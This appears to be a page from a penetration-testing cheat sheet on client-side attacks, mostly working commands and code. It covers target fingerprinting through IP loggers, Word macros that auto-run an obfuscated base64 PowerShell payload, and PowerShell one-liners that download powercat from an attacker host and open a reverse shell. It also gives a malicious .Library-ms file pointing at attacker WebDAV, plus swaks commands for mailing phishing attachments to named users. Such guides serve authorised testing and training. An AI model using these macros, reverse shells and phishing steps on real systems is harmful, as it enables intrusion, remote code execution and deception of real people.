Client side attacks

Information Gathering

When you will enconter any file from the victim (e.g. posted on site) you can use exiftool in order to extract some data.

exiftool <FILE>

Client fingerprinting

Canary tokens is a free web service that generates a link with an embedded token that we'll send to the target.

We could also use an online IP logger like Grabify or JavaScript fingerprinting libraries such as fingerprint.js.

Web bug / url token

User Agent can be modified so it is not always the best source of information.

We can phish our victim into clicking the link - that will get us their IP, OS type and Web Browser Information.

Exploiting Microsoft Office

Save document with .doc extension

Microsoft Office applications like Word and Excel allow users to embed macros,1 which are a series of commands and instructions grouped together to programmatically accomplish a task. We can leverege macros to gain remote code execution on the machine.

Macros can be written from scratch in Visual Basic for Applications (VBA)

In order to create macro in Microsoft Word go to:

View > Macros

Open powershell when user enter the file:

Sub AutoOpen()

  MyMacro
  
End Sub

Sub Document_Open()

  MyMacro
  
End Sub

Sub MyMacro()

  CreateObject("Wscript.Shell").Run "powershell"
  
End Sub

In order to create reverse shell do the following steps:

Prepare payload which will download and run powercat:

Do not forget to set up fileserver with powercat and netcat listener.

IEX (New-Object System.Net.Webclient).DownloadString("http://<IP>:<PORT>/powercat.ps1");powercat -c <IP> -p <PORT> -e powershell

Encode the payload with base64 (UTF-16LE):

echo "<PAYLOAD>" | base64

Split the code into parts using python:

str = "powershell.exe -nop -w hidden -e <BASE64_PAYLOAD>"

n = 50

for i in range(0, len(str), n):
	print("Str = Str + " + '"' + str[i:i+n] + '"')

Final code:

Sub AutoOpen()

  MyMacro
  
End Sub

Sub Document_Open()

  MyMacro
  
End Sub

Sub MyMacro()
  Dim Str As String
  <OUTPUT_FROM_PYTHON>
  
  CreateObject("Wscript.Shell").Run Str
End Sub

Windows Library Files Code Execution

Kali WebDav Hosting:

If you do not have wsgidav installed you can install it with the following command: pip3 install wsgidav

/home/kali/.local/bin/wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali/webdav/

Malicious file code:

Save the file with .Library-ms extenstion.

<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
    <name>@windows.storage.dll,-34582</name>
    <version>6</version>
    <isLibraryPinned>true</isLibraryPinned>
    <iconReference>imageres.dll,-1003</iconReference>
    <templateInfo>
    <folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
    </templateInfo>
    <searchConnectorDescriptionList>
    <searchConnectorDescription>
    <isDefaultSaveLocation>true</isDefaultSaveLocation>
    <isSupported>false</isSupported>
    <simpleLocation>
    <url>http://[WEBDAV_IP]</url>
    </simpleLocation>
    </searchConnectorDescription>
    </searchConnectorDescriptionList>
</libraryDescription>

Create shortcut (.lnk) with reverse shell comand and upload it to the webdav.

powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://<IP>:<PORT>/powercat.ps1'); powercat -c <IP> -p <PORT> -e powershell"

Send phishing email

sudo swaks -t <TARGET_USER>@<TARGET_DOMAIN> --from <ATTACKER_EMAIL@<TARGET_DOMAIN> --attach @config.Library-ms --server <MAIL_SERVER> --body @<txt_file> --header "Subject: <Subject>" --suppress-data -ap

If you get auth error using the above command try this one:

sudo swaks -t daniela@beyond.com -t marcus@beyond.com --from john@beyond.com --attach config.Library-ms --server 192.168.227.242 --body body.txt --header "Subject: Staging Script" --suppress-data -ap
PreviousLateral MovementNextMetasploit

Last updated